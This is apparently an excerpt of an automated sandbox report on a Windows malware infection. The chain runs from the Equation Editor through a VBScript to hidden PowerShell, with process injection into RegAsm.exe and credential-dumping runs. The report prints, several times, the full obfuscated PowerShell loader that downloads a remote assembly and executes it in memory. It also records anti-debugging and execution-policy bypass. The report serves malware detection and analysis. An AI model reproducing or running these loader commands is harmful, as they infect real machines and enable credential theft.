                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00443355 mov eax, dword ptr fs:[00000030h]13_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10004AB4 mov eax, dword ptr fs:[00000030h]13_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,13_2_00411D39
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434BD8 SetUnhandledExceptionFilter,13_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0043BB71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Bypasses PowerShell execution policy
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Contains functionality to inject code into remote processes
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,13_2_0041812A
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419662 mouse_event,13_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor1ygjyptrhiqjykubmfnzvszldexldjdlupvau4njykoicgoj3sxfxvybca9ihswfwh0dccrj3bzjysnoi8nkycvcmf3lmcnkydpdccrj2h1ynvzzxjjb250jysnzw50jysnlmnvjysnbs9ob0rljysndgvjjysnde9ujysnl04nkydvrccrj2unkyd0zwn0jysnt24vcmvmcycrjy9ozwfkcy8nkydtywlujysnl0rldgenkydotm8nkyd0ac1wlnr4dhswftsgezenkyd9jysnyicrj2fzzty0q29udgvudca9ichozxcnkyctt2inkydqzwmnkyd0ifmnkyd5jysncycrj3rlbs5ozxqnkycuv2vijysnq2xpzscrj250ks4nkydeb3dubg8nkydhzfn0cicrj2luzyh7jysnmx11jysncmwpoyb7mx1ijysnaw4nkydhcnldb250zw50id0gwycrj1n5c3qnkydljysnbs4nkyddbycrj252zxinkyd0jysnxscrjzo6jysnrnjvbujhjysnc2u2jysnnfmnkyd0jysncmknkyduzyh7jysnmscrj31iyscrj3nljysnnjrdb250jysnzscrj24nkyd0ktsgezf9yscrj3nzzw1ibhkgpsbbjysnumunkydmbgvjdccrj2knkydvbicrjy4nkydbc3nlbscrj2inkydsev0nkyc6oicrj0xvjysnywqojysnezf9yicrj2luyxinkyd5q29udgunkydudck7iftkbmwnkydpyi5jty4nkydib21lxscrjzo6jysnvkenkydjkhsyfxr4jysndc5cr0ynkydslycrjzankycxjysnns84ljcuoccrjzyxljqwms8vjysnonb0dgh7mn0sihsnkycyjysnfscrj2qnkydlc2enkyd0axzhzg97mn0nkycsihsyfwrljysncycrj2f0axzhzccrj28nkyd7micrj30sihsyjysnfwrlcycrj2f0jysnaxzhjysnzg97jysnmn0nkycsihsyfvinkydljysnz0fzbxsnkycyfswgezinkyd9ezj9lccrj3snkycyjysnfscrj3syfsknks1miftjsefsxtm5lftjsefsxtm2lftjsefsxtm0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((gv '*mdr*').name[3,11,2]-join'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/node'+'tec'+'ton'+'/n'+'od'+'e'+'tect'+'on/refs'+'/heads/'+'main'+'/deta'+'hno'+'th-v.txt{0}; {1'+'}'+'b'+'ase64content = (new'+'-ob'+'jec'+'t s'+'y'+'s'+'tem.net'+'.web'+'clie'+'nt).'+'downlo'+'adstr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'arycontent = ['+'syst'+'e'+'m.'+'co'+'nver'+'t'+']'+'::'+'fromba'+'se6'+'4s'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'re'+'flect'+'i'+'on'+'.'+'assem'+'b'+'ly]'+'::'+'lo'+'ad('+'{1}b'+'inar'+'yconte'+'nt); [dnl'+'ib.io.'+'home]'+'::'+'va'+'i({2}tx'+'t.bgf'+'r/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}r'+'e'+'gasm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [char]39,[char]36,[char]34))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor1ygjyptrhiqjykubmfnzvszldexldjdlupvau4njykoicgoj3sxfxvybca9ihswfwh0dccrj3bzjysnoi8nkycvcmf3lmcnkydpdccrj2h1ynvzzxjjb250jysnzw50jysnlmnvjysnbs9ob0rljysndgvjjysnde9ujysnl04nkydvrccrj2unkyd0zwn0jysnt24vcmvmcycrjy9ozwfkcy8nkydtywlujysnl0rldgenkydotm8nkyd0ac1wlnr4dhswftsgezenkyd9jysnyicrj2fzzty0q29udgvudca9ichozxcnkyctt2inkydqzwmnkyd0ifmnkyd5jysncycrj3rlbs5ozxqnkycuv2vijysnq2xpzscrj250ks4nkydeb3dubg8nkydhzfn0cicrj2luzyh7jysnmx11jysncmwpoyb7mx1ijysnaw4nkydhcnldb250zw50id0gwycrj1n5c3qnkydljysnbs4nkyddbycrj252zxinkyd0jysnxscrjzo6jysnrnjvbujhjysnc2u2jysnnfmnkyd0jysncmknkyduzyh7jysnmscrj31iyscrj3nljysnnjrdb250jysnzscrj24nkyd0ktsgezf9yscrj3nzzw1ibhkgpsbbjysnumunkydmbgvjdccrj2knkydvbicrjy4nkydbc3nlbscrj2inkydsev0nkyc6oicrj0xvjysnywqojysnezf9yicrj2luyxinkyd5q29udgunkydudck7iftkbmwnkydpyi5jty4nkydib21lxscrjzo6jysnvkenkydjkhsyfxr4jysndc5cr0ynkydslycrjzankycxjysnns84ljcuoccrjzyxljqwms8vjysnonb0dgh7mn0sihsnkycyjysnfscrj2qnkydlc2enkyd0axzhzg97mn0nkycsihsyfwrljysncycrj2f0axzhzccrj28nkyd7micrj30sihsyjysnfwrlcycrj2f0jysnaxzhjysnzg97jysnmn0nkycsihsyfvinkydljysnz0fzbxsnkycyfswgezinkyd9ezj9lccrj3snkycyjysnfscrj3syfsknks1miftjsefsxtm5lftjsefsxtm2lftjsefsxtm0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((gv '*mdr*').name[3,11,2]-join'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/node'+'tec'+'ton'+'/n'+'od'+'e'+'tect'+'on/refs'+'/heads/'+'main'+'/deta'+'hno'+'th-v.txt{0}; {1'+'}'+'b'+'ase64content = (new'+'-ob'+'jec'+'t s'+'y'+'s'+'tem.net'+'.web'+'clie'+'nt).'+'downlo'+'adstr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'arycontent = ['+'syst'+'e'+'m.'+'co'+'nver'+'t'+']'+'::'+'fromba'+'se6'+'4s'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'re'+'flect'+'i'+'on'+'.'+'assem'+'b'+'ly]'+'::'+'lo'+'ad('+'{1}b'+'inar'+'yconte'+'nt); [dnl'+'ib.io.'+'home]'+'::'+'va'+'i({2}tx'+'t.bgf'+'r/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}r'+'e'+'gasm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [char]39,[char]36,[char]34))"Jump to behavior
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GdProgram Manager@
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GdProgram Manager8|
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChromeion 01-10- 2024 [Compatibility Mode] - Microsoft Wordsz
                Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.drBinary or memory string: [Program Manager]
                Source: RegAsm.exe, 0000000D.00000002.919771377.0000000000393000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GdProgram Manager
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434CB6 cpuid 13_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_004525C3
